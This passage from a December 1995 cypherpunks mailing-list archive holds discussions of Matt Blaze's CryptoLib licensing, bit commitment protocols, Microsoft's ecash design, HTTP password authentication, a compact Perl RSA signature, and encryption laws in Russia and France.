X * TESTED ONLY UNDER SUNOS 4.x and BSDI 2.0.
X *
X * WIN32 port TESTED ONLY UNDER WINDOWS '95
X *   (further testing recommended)
X *   Requires Winmm.lib
X *
X * This is unsupported software.  Use at own risk.
X * Test carefully on new platforms.
X */
X/*
X * The authors of this software are Matt Blaze and Jack Lacy
X *              Copyright (c) 1995 by AT&T Bell Laboratories.
X *
X * WIN32 port by Frank O'Dwyer
X *              Copyright (c) 1995 by Rainbow Diamond Limited
X *
X * Permission to use, copy, and modify this software without fee is
X * hereby granted, provided that this entire notice is included in all
X * copies of any software which is or includes a copy or modification
X * of this software and in all copies of the supporting documentation
X * for such software.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR
X * IMPLIED WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T
X * NOR RAINBOW DIAMOND LIMITED MAKE ANY REPRESENTATION OR WARRANTY
X * OF ANY KIND CONCERNING THE MERCHANTABILITY OF THIS SOFTWARE OR
X * ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */

Nothing, but nothing in there restricts you from doing anything you like
with the software, as long as you provide attributation.

>If they were serious, they'd gpl it.

Maybe they don't like the terms of the gpl?  Maybe they don't want
to restrict *you* to having to give it away?  (And before you jump
my ass for being anti-gnu, go check the various GNU sources for work
I've submitted in the past.)

>I don't understand why this group continues to tolerate these blatently
>commercial messages from att (and netscape.) (The message is
>really just an ad for the cryptolib product, as it says). I've also said
>this b4 but I'll say it again: why would anyone in their right mind trust
>binary code from att after the clipper fiasco.

Is this where we point out that it was Young Master Blaze who pointed out the
technical failure in Clipper?

>And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
>cypherpunks, when they are so clearly just working us for their
>corporate interests? I wonder how much they get paid to monitor this
>list?

"Cypherpunks write code."  (Where is yours?)

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 19 Dec 95 20:41:51 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951219233125.26112A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, Perry E. Metzger wrote:

> ECafe Anonymous Remailer writes:
> [Lots of garbage slandering Matt Blaze, who's about as close to being
> a dyed-in-the-DNA cypherpunk as you can get.]
> 
> What I want to know is, why are you doing this? Are you trying to
> start a flame war? Are you just an asshole? Are you Detweiler? Whats
> the motive?

What _I_ want to know is, is this a troll from the same person who posted 
the RSA patch for the cryptolib, and is now slandering it.

(Re: the patch... it seemed to work on my copy, it passed the test... but 
NOTHING uses the damn library that I can just test it with)

More 'anonymous' persons should choose to be pseudonymous...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Dec 95 00:47:20 PST
To: cypherpunks@toad.com
Subject: on web standards: sent to Markoff
Message-ID: <199512200844.AAA24193@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



here's a quickie rant about software standards sent to Markoff, precipitated 
by his recent column on Berners Lee & the Web. please help kill the urban 
legend I refer to in this letter.

------- Forwarded Message

Subject: tim berners lee etc.
Date: Wed, 20 Dec 95 00:39:44 -0800
From: "Vladimir Z. Nuri" <vznuri@netcom.com>


I read your recent article on Tim Berners Lee. there is a misconception
in the article that annoys me and that I have seen you/others repeat
elsewhere. the following myth is:

COMPANIES SET STANDARDS.

this is not really true. in the short term, companies can set whatever
"standards" they like. but in the long term, the *market* decides what
standards are acceptable. an example of this was IBM: they set various
standards until the market decided that the "standards" they were setting
were not acceptable. they became their own worst enemy. no amount of
shovelling their ideas down consumer's throats via million dollar ad
campaigns or sales pressure changed the basic reality
of what the market wanted. even though "microchannel" may have been
technically superior, consumers consistently decided the proprietary
price of the architecture was not worth the extra economic burden
to obtain it.

you and others are continually reiterating and reinforcing this myth
in regards to web software in your writing. you talk about 
various companies as if they
could somehow seize various standards for their own and exclude other
companies (Netscape's supposed proprietary web "standards" are an example).
this is fallacious for the reason I outlined above. the market
may not tolerate this exclusivity, and particularly in the area of 
computer software and hardware this has been shown emphatically so.

furthermore, the idea that companies can legislate their own web
standards is particularly ludicrous. it is true that netscape has
added their own "extensions" that their own browser understands and
other browsers initially do not. but nothing prevents other companies
from immediately incorporating these "enhancements" so that they
are recognized by their own software. in fact this is trivial to do
so in many cases (e.g. one of these so-called "enhancements" is blinking
text in web pages). so the idea that a single web company can somehow
monkeywrench the standards process by introducing new ideas is 
absurd and completely ignorant of reality.

in fact this rapid "standard" fluctation is the heart of innovation.
it is true that the web standard is fluctuating very rapidly right
now, but that is not evidence of companies trying to seize the standard
for their own: instead it is the chief sign of dynamic and rapid innovation.

I urge you to read Bill Gate's recent book. he addresses this continual
myth that people yammer about, namely the idea that individual companies
can set exclusive or proprietary standards. a company standard is in
fact a sort of temporary whirlpool in time: it will exist only so
long as the forces surrounding it support it. a single company can
temporarily create an illusion that their standards are the only ones
available, but the market may eventually decide that their standard is
not appropriate. Microsoft would crumble in a short amount of time if
they failed to deliver what the market demands, and Gates reiterates
this theme.

it is tempting to think of Microsoft or Netscape as large behemoths
that "drive the market". this is true in the short term but 
in truth over the long term the market drives these companies,
and they lose market share if they become irrelevant. it is useful
to look at one company as a focus of market forces, not the determinant
of them.

in my opinion the idea that various companies are in control of the
market is not only erroneous but highly dangerous. it leads to the
view that the government has to step in to promote "fair competition"
or "legislate standards". these approaches are usually total failures
because they completely neglect the true nature of the innovation of
ideas, something that is expressed quite tangibly and viscerally in
software development, but this simple point various people still
utterly fail to grasp.

its quite dramatic to write about single companies such as Microsoft
or Netscape as if they have tremendous power and influence over
the industry. various companies have found however that this 
influence is highly fleeting if they are not in tune with market
currents. companies are subservient to the market, not vice versa.
please strive to recognize this basic fact in your future writing.


p.s. I am willing to work this into a letter to the editor if you are
willing to publish it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Wed, 20 Dec 95 01:01:24 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: cyphernomicon FTP site?
In-Reply-To: <m0tSH6U-00090OC@pacifier.com>
Message-ID: <199512200858.AAA26214@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 04:18 PM 12/19/95 -0500, you wrote:
> >Anyone know where I can FTP a full copy of the cyphernomicon?
> >
> 
> I'm interested in this too.  I really HATE those silly HTML documents that
> can't (or, at least, I haven't yet figured out how) be downloaded in one
> swell foop.  
> 
    When using lynx from my shell account, I like to grab the whole
    thing at once at net speed.  Just now this took 65 seconds for
    the 1.28 Mb with obvious pauses ( I've seen it twice as fast).

    http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ 

   



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 95 23:34:39 PST
To: "Vinod Valloppillil" <cypherpunks@toad.com
Subject: Re: cyphernomicon FTP site?
Message-ID: <acfcfac90d021004d8b1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:18 PM 12/19/95, Vinod Valloppillil wrote:
>Anyone know where I can FTP a full copy of the cyphernomicon?

It would help if you said what you'd tried. For example, have you tried
ftp.netcom.com in the directory pub/tc/tcmay? There you will find several
versions, including compressed versions.

This can be hard to access, due to crowding, but can eventually be gotten to.

It has also been placed at other locations, according to reports here.
Check the archives.

Personally, I hear that even the author prefers the HTML version at
http://www.oberlin.edu/~brchkind/cyphernomicon/.

Anybody who plans to download the entire linear file and then print it out
must be missing a bits in his shift register.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 19 Dec 95 16:07:44 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512200007.BAA29596@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>I would think that ISPs (and even commercial online services) would
>prefer that their customers use strong crypto because it's less for
>them to worry about ("Are they really sending pornography or death
>threats though our network?").

While most ISP's may not want to be responsible for monitoring 
transmissions, check out a portion of an agreement from mine. 
(I haven't and won't sign such an agreement, may therefore be 
terminated at month's end.)

"4.1  PCIX may elect to electronically monitor any and all 
traffic which passes over our Wide Area Network.  This 
monitoring may include public as well as private communications 
and data transfers from our Members and to our Members as well 
as any and all communications and data transfers to and from 
any other internet sites. ....  The monitoring and disclosure 
activities of PCIX may negate the privacy protections which 
the Member would otherwise enjoy under federal and state law, 
including the Electronic Privacy Communications Act.  Member 
specifically agrees that PCIX may do so and Member understands 
that he or she is giving up privacy rights which he or she 
would otherwise be entitled to under the law."

Hope this isn't the start of a trend!

groundfog@nym.gondolin.org








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 19 Dec 95 22:37:28 PST
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <199512200638.BAA34608@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Phill <hallam@w3.org> wrote:

<snip>

>It is very strange the way that "Libertarians" are so able to turn all
>rights into property rights. Thus freedom of speech become freedom to have
>influence on the politicial process in direct proportion to wealth.

And what do you propose? Speech in proportion to ability to bitch???

<snip>

>When the Web becomes as ubiquitous as the telephone we 
>will still see inequalities of power, the homeless and the poor will still >be underrepresented.

Let me guess, somehow the government can cure this?

>But that situation must be judged against our own where the 
>political process can be bought and traded as if it were any other form of 
>comodity.
>
>It is not simply an issue of money, it is an issue of national security. If a 
>foreigner were to control the majority of the media there would be a significant 
>threat to the national interest. This threat has been realised in the UK with 
>the comming to power of Rupert Murdoch. Fortunately his influence on the US 
>political scene has thus far been minor. In his own country he has brought down 
>the government more than once.

So what??? He gives us "The Simpsons" and "Married, With Children!"
[IMO] Rupert has done more for humor than any humor-impaired liberal
has ever done!

>>And as far as "prevent the political process from being owned by the rich" 
>>goes, there have been brief exceptions over the last 5000 years in which
>>the less-rich have overthrown the rich, but campaign finance laws have >>almost never kept the rich or the politicians from helping each other out.

So??? I'm fighting them, are you???

>In UK politicis the influence of an individual's money is limited to influencing 
>one party. Even that is done behind closed doors. The other major parties both 
>limit the size of individual contributions to a constituency party to a 
>relatively nominal sum. $5000 is a huge sum in UK politics.

They probably bribe in accordance with the marketplace. Big deal.

>>I also don't believe freedom of speech should be limited by national 
>>boundaries.
>
>Nor do I. But I only vote in one country. If we take the question outside >the US 
>it would not on the whole be a good thing if the Prime Minister of Tobago (say) 
>were provided with a campaign contribution of $1M by a foreign company with >an 
>interest in strip mining the entire island. similarly it would be a bad >thing if 
>Columbian drug lords were to make massive contributions to politicians >committed 
>to continuing the prohibition on drugs.

They do, right now. Do you think the Libertarians have gotten any
contributions from the drug-smugglers??? If so, please tell me what you
are on and where I can get some. Otherwise, kwitcherbitchin.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMNesZ21lp8bpvW01AQGxjgQAscGA5sMXQWaXSqGrGMEhFlnYXUYUzoQH
YsivCtTZTaIZYUfRoo4Myjx7B8MVpgykMOJC0PHLA+zWurW6AQ2W45ywLUceoQbF
0UF/JXZi2mhHI0xLwKV6E+GaWdaiuAdh6uKwLyND2S07bBGiPZ4hBG05+Xkm5s/d
OJ6QcCwtsuM=
=iPRn
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
Regards, Jim Ray
http://www.shopmiami.com/prs/jimray
"Thank God we don't get all the government we pay for." -- Will Rogers
[Back when we paid for (and got) a  _lot_  less government.]
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
-----------------------------------------------------------------------
Help Phil! e-mail zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Dec 95 01:27:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Bit Commitment Query
In-Reply-To: <30D7A993.3F54@maths.su.oz.au>
Message-ID: <199512200927.EAA27328@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


robbie gates, apprentice algebraist writes:
> In essence, why doesn't the following work:
> 
> 1. Alice has a bit b.  She picks a random bit string R and sends Bob
> 	h(R,b)
> 
> 2. To verify, she tells Bob R and b.
> 
> Assuming Bob knows b is a single bit, how does Alice cheat without needing
> to produce hash collisions for h.

Hmmm. I can't see anything wrong with your reasoning, and I too am puzzled by
Schneier's comment about Alice needing to send R_1 to Bob initially. I hope
someone else will give a more authoritative answer.

Your question prompted me to study the other bit commitment protocols in
_AC_ a bit more closely (pun not intended). Schneier observes that the
b.c. with hash function protocol you cited has an advantage over the b.c.
protocol with symmetric encryption he describes (v.1,pg.72). Namely, the
hashing b.c. protocol only needs one-way communication after the protocol 
negotiation. 

It seems to me that the encryption b.c. protocol he gives can easily be
modified to require only one-way communication (Alice-->Bob). The modified
protocol goes like this:

[0] Alice has a bit b, and generates a secret key K and a random string R.

[1] Alice --- E_K(R, b), R --> Bob

[2] Alice wants to reveal her committed bit.

[3] Alice --- K --> Bob

[4] Bob computes D_K(E_K(R, b)) = (R, b) and checks the value of b (or cries
    foul if R has the wrong value)

This can't possibly be a new idea, but I don't know the literature well enough
to give a reference. Of course, the other possibility is that this protocol
is broken. :}  If E is a good encryption algorithm, it should be hard for
Alice to find K_2 s.t. D_K_2(E_K(R, b)) = (R, 1-b), even though she
gets to choose R. 

Comments ?  Why might we prefer to use the encryption b.c. protocol in 
Schneier to something like the above ?

-Futplex <futplex@pseudonym.com>			R.I.P. Brian Jones
(apprentice cryptographer)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Wed, 20 Dec 95 03:57:41 PST
To: cypherpunks@toad.com
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
Message-ID: <2.2b9.32.19951220115525.0069303c@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:46 PM 12/18/95 -0800, Rich Graves wrote:
>Except for the bit about the file not being deleted after quitting
>Netscape (which is Bad), this is old news. This is why security-conscious
>sites like banking.wellsfargo.com ask for passwords in an SSL-encrypted
>form rather than via simple browser authentication. 

On a related note, how does Netscape (or HTTP in general) authenticate using
the password? My best guess, without a sniffer, is (making up error codes as
I go along, but you get the point):

        Browser Sends: GET ...
        Server Replies:  4xx (3xx? 2xx?) Sorry. I need authentication.
        Browser (after querying user): GET along with user-name/password
        Server: ...whatever the page is...

Given that, what allows me to go on and see other (protected) pages on the
same server without being re-prompted? Is it a similar conversation to the
one above or does the browser broadcast the password on every subsequent
request? I cannot ascertain the behavior by going to another site protected
by a different password. Either one is possible. What I'm hoping happens
with multiple sites is:

        Browser Sends: GET ...
        Server Replies:  4xx (3xx? 2xx?) Sorry. I need authentication.
        Browser (after querying user): GET along with user-name/password
        Server: ...whatever the page is...
     (1)Browser (to a different server): GET ...
        Server2:  4xx (3xx? 2xx?) Sorry. I need authentication.
        Browser: user-name/password cached from before
        Server2:  4xx (3xx? 2xx?) Sorry. That's not it. I need authentication.
     (2)Browser (after re-querying user): GET user-name2/password2
        Server: ...whatever the page is...

The broadcast option would change (1) to (2) above to:

     (1)Browser (to a different server): GET along with user-name/password
        Server2:  4xx (3xx? 2xx?) Sorry. (That's not it?) I need authentication.
     (2)Browser (after re-querying user): GET user-name2/password2

Admittedly, the second one is more optimal, but does this mean it would
broadcast the user/passwd to every site? Even the first option winds up
sending wrong passwords to other servers. Does the browser re-prompt if it
detects a new IP address or a different sub-tree of the same server?

Anyway, lots of conjecture (sp?) here. Does anyone know how it really works
or can point me at a reference? Thanks.

					Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Wed, 20 Dec 95 04:23:47 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <2.2b9.32.19951220122140.00684794@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 12/19/95 GMT, ECafe Anonymous Remailer wrote:
>
>And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
>cypherpunks, when they are so clearly just working us for their
>corporate interests? I wonder how much they get paid to monitor this
>list?

Matt, if you're getting paid to read this list, I want a new contract.

					Karl A. Siil
					AT&T BCS Advanced Projects
					908-949-4037
					908-949-8978 (FAX)
					karl@cosmos.cosmos.att.com
					!karlsiil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Dec 95 09:06:26 PST
To: cypherpunks@toad.com
Subject: Re: cyphernomicon FTP site?
Message-ID: <2.2b7.32.19951220170717.008dcd74@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 AM 12/20/95 -0800, you wrote:
>At 9:18 PM 12/19/95, Vinod Valloppillil wrote:
>>Anyone know where I can FTP a full copy of the cyphernomicon?
[Much deleted]
>Anybody who plans to download the entire linear file and then print it out
>must be missing a bits in his shift register.

There are reasons to want a non-html version.  The best being uploading to
your favorite text-oriented BBSes.  (Or crypto-oriented BBSes.)  Not
everyone has access to the web.  (Yes, I know it is blasphemy...)

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 20 Dec 95 07:44:48 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <2.2b9.32.19951220122140.00684794@cosmos.cosmos.att.com>
Message-ID: <i4VegD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Karl A. Siil" <karl@cosmos.cosmos.att.com> writes:
> At 10:32 PM 12/19/95 GMT, ECafe Anonymous Remailer wrote:
> >
> >And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
> >cypherpunks, when they are so clearly just working us for their
> >corporate interests? I wonder how much they get paid to monitor this
> >list?
>
> Matt, if you're getting paid to read this list, I want a new contract.

Karl, are you an unpaid volunteer at AT&T, or do you quit your job every
time you read your e-mail?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 20 Dec 95 09:21:19 PST
To: rah@shipwright.com
Subject: Re:  King Kong Does e$
Message-ID: <199512201719.JAA12291@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Bob Hettinga for typing that long message about the Microsoft
"ecash" scheme.  That is some nimble note-taking.  I have a few comments
on the scheme as Bob presented it, and as it compares to Digicash.  I
will follow up with some commentary about the politics involved.

>         Customer chooses secret s, serial number n, n=h(s) and amount.
>         Customer pays bank (by any method) the amount of the desired banknote
>         bank signs serial number and amount
>         Transaction may be anonymous (physical cash purchase at bank) pick
>         serial number, bank uses private signature to sign the serial number.
>[...] 
> How is it used for payment
>         Payer simply gives bank note to payee by handing over the secret
>         payee immediately exchanges the banknote for new ones anonymously, if
>         desired
>         Old banknote is now invalid, since bank has its secret; hence payer
>         can't respend it
>         If the bank note is already invalid, bank rejcts exchange and informs
>         payee.
>         "In effect, these are disposable banknotes"

The withdrawal protocol has some similarities to online Digicash ecash.
In that system, you choose a random number s, calculate a one way
function h(s), and get that signed by the bank.  Unlike in the Microsoft
scheme, blinding is used for the signature.  I imagine Microsoft avoids
blinding because of the patent situation, and possibly due to legal
concerns about anonymity (more on this below).  With Digicash, the coin
is then the pair s, SIGN(h(s)).  This is then given to the shop as
payment.  It can check the bank's signature, but that is not enough;
being an online scheme, it must also turn the coin in at the bank to
prevent double spending.  The bank checks the signature and that the coin
is well formed to accept it.

The Microsoft scheme is like an unblinded version of this.  The bank
simply signs h(s) and gives that to the customer.  This allows a
simplification in the spending.  Instead of passing s, SIGN(h(s)), it is
enough just to pass s.  The payee gives this to the bank (since this is
an online system), which given s can calculate h(s) and check this
against a list of all valid coins.  It knows the valid coin numbers
because it saw them when it signed them (unlike with Digicash).  So there
is a slight space savings in the spending protocol.

It is also not necessary for the messages to and from the bank to be
encrypted during the withdrawal protocol; neither knowing h(s) nor
SIGN(h(s)) will allow an attacker to spend the coin, since he doesn't
know s.  A similar thing is true of DigiCash, though, where the blinded
pre-signed or signed coins are useless to an attacker since he doesn't
know the blinding factor.

The big problem then with the Microsoft system is that it is not
anonymous.  As a result, it is technically not electronic cash, at
least as the word is used in the literature.  However we are seeing so
many proposals like this, all of them wanting to capitalize on this
magic word "cash", that I suppose the definition has to be considered
to be shifting.  In the new usage, virtually any payment system can be
called cash if there is some way that users can be anonymous in using
it.  And since by allowing anonymous accounts virtually any payment
system can do this, the word is becoming meaningless.

The problem I see in practice with using their cash anonymously is how to
buy it.  If I have an account with the Bank of Microsoft, and I withdraw
some "mcash", deducting it from my account balance, that mcash will be
linkable to my account when I spend it.  In order to be anonymous I have
to buy the cash anonymously.  I can walk into the local bank with a
floppy and some dollar bills, but that is not practical in general.  I
could use mcash to buy some more mcash, but even if the second
transaction is anonymous, the bank knows that I was the one who withdrew
the first set of mcash, so it can link me to the second set when it is
spent.

The only good solution I can see is to use Digicash ecash to anonymously
buy Microsoft mcash, but I doubt that that is what they had in mind!

Frankly, what I see in this message is another example of something which
is starting to become common: marketing to cypherpunks.  In a way it is a
very positive sign, that our views and concerns are becoming so well
known and widespread that companies like Microsoft and Netscape are doing
their best to keep on the good side of people like us, who are concerned
about strong privacy and security.  In some ways our attitudes are
becoming dominant on the net, thanks to the many excellent writers here,
as well as magazines like Wired, and groups like the EFF and other
interest groups.

But this influence is making us a target of companies who know that
gaining our approval, or at least avoiding our criticism, is important
for success on the net.  In many cases, such as the recent flap over
Netscape's attitudes towards key escrow, I detect a whiff of two
sidedness, in which one attitude is presented for the benefit of
government and law enforcement interests, while another posture, more
acceptable to cypherpunks, is adopted on the net.  With Microsoft, they
use the magic word "cash" a great deal, in my view hoping that we will
line up in favor of the idea.  But as I have explained it is not really
anonymous, no more so than any other payment system.  And it is not at
all clear that the kinds of anonymous accounts that would be necessary
to really make it anonymous will be allowed.  In that case, Microsoft
can just shrug and say, "well, we tried."  They get the best of both
worlds.  They make the government happy by providing a traceable
payment system, while they look good on the net by pushing "electronic
cash".

I don't have any proof that this is exactly what is going on.  But it is
possible, and I think we have to be skeptical and at least open to the
possibility that this kind of manipulation is occuring, no matter how
many assurances we get from the companies involved that they are really
on our side.  Finance is a high stakes business and there is a lot of
government regulation involved.  Where our interests and the government's
diverge, we need to watch closely to see whether the companies' actions
match their words.  This kind of marketing is going to continue to increase,
I expect.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 20 Dec 95 01:58:46 PST
To: alano@teleport.com (Alan Olsen)
Subject: Re: [even more NOISE] BIO-MUNITION: gifs of perl-RSA tattoo
Message-ID: <22479.9512200957@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen <alano@teleport.com> writes:
> [Much noise on Perl-RSA tatoo and compile problems deleted]
> 
> The only thought that came to mind on this thread was how closely
> the tatoo artist spellchecked that tatoo.  It would be pretty funny
> to have a "munitions violation" that was non-functional due to
> tatooing errors.

Funny you should say that... I thought I'd better check (before you
mentioned this btw) by transcribing from the (slightly grainy) gif,
and Richard did miss one char, fortunately in an easily correctable
position.  I'd guess his wife has probably tattooed the missing ` by
now.

(The ` was missing from the line:

$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa

but there was a bit of white space between the = and the e -- plenty
enough for a ` -- phew that was close!

While I'm here generating noise, someone just sent me this:

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-5-lines-PERL
do 'bigint.pl';($_,$n)=@ARGV;s/^.(..)*$/0$&/;($k=unpack('B*',pack('H*',$_)))=~
s/^0*//;$x=0;$z=$n=~s/./$x=&badd(&bmul($x,16),hex$&)/ge;while(read(STDIN,$_,$w
=((2*$d-1+$z)&~1)/2)){$r=1;$_=substr($_."\0"x$w,$c=0,$w);s/.|\n/$c=&badd(&bmul
($c,256),ord$&)/ge;$_=$k;s/./$r=&bmod(&bmul($r,$r),$x),$&?$r=&bmod(&bmul($r,$c
),$x):0,""/ge;($r,$t)=&bdiv($r,256),$_=pack(C,$t).$_ while$w--+1-2*$d;print}

Significance?  It's in pure perl -- no use of dc.  I was *very*
impressed.  It's a fair bit slower unfortunately, but some people
objected to the other one on the grounds that it was cheating to use
an external program (dc).  Also that will work on PCs without mods.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 20 Dec 95 06:24:48 PST
To: karl@cosmos.cosmos.att.com (Karl A. Siil)
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape
In-Reply-To: <2.2b9.32.19951220115525.0069303c@cosmos.cosmos.att.com>
Message-ID: <199512201501.KAA28003@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Karl A. Siil writes:

> On a related note, how does Netscape (or HTTP in general) authenticate using
> the password? My best guess, without a sniffer, is (making up error codes as
> I go along, but you get the point):

> Anyway, lots of conjecture (sp?) here. Does anyone know how it really works
> or can point me at a reference? Thanks.

http://www.w3.org/hypertext/WWW/Protocols/HTTP1.0/draft-ietf-http-spec.html#AA


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 20 Dec 95 08:11:18 PST
To: cypherpunks@toad.com
Subject: Re: Which countries don't allow encryption ?
In-Reply-To: <9512201335.AA01573@imdwd01>
Message-ID: <75ZegD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


visentin@imdwd01.milano.italtel.it writes:
> I'm trying to address the following issue: people at
> my company need to exchange sensitive information with
> their colleagues abroad (e.g. East Europe, or Southern
> America).
...
> I read somewhere that Russian law forbids the use on
> encryption: is this correct ?

More or less. President Yeltsin's edict of April 3, 1995, prohibits the
use of encryption without a licence from FAPSI. I've been told that
"everybody" continues to use PGP and no one's had any trouble yet.
However in today's climate I can imagine a Western business blatantly
violating the edict, being threatened with prosecution, and being shaken
down for a bribe... For a peace of mind, why don't your correspondents
go to FASPI and simply ask for a licence. They're nice people.

You might have more of a problem in France, where, as far as I know, you
must deposit your cryptographic keys with the government, so it may read
your correspondence. Soon this may be required in the U.S. as well.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 19 Dec 95 16:27:58 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <acfa2f2812021004d314@[205.199.118.202]>
Message-ID: <199512200022.LAA28002@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

tcmay wrote:
...
> Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
> has two factors.)
...

Can someone enlighten me as to what the two factors are?

With sensible definitions I've heard you either get one (just itself)
or four (itself [p], both units [1,-1] and the co-whatsitsname [-p]).

(Sorry to pick on tcmay, but usually when you factorise a number you
*never* put it a "1*", for example:
  6 = 2*3
  9 = 3*3*3
and
  7 = 7
not
  7 = 1*7
, so I suspect the usual statement would be "Every prime has one factor.".)


Or am I totally clueless?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMNdXQyxV6mvvBgf5AQEaNwP/RB9ABUWWX20hChSFC5embOLwv7dhI4qU
rJkz/VmOM8y746be87nAIKCih3hJCz7G4OqsqiVdtvhx2FqldqSuw6Jmp3Mx41ut
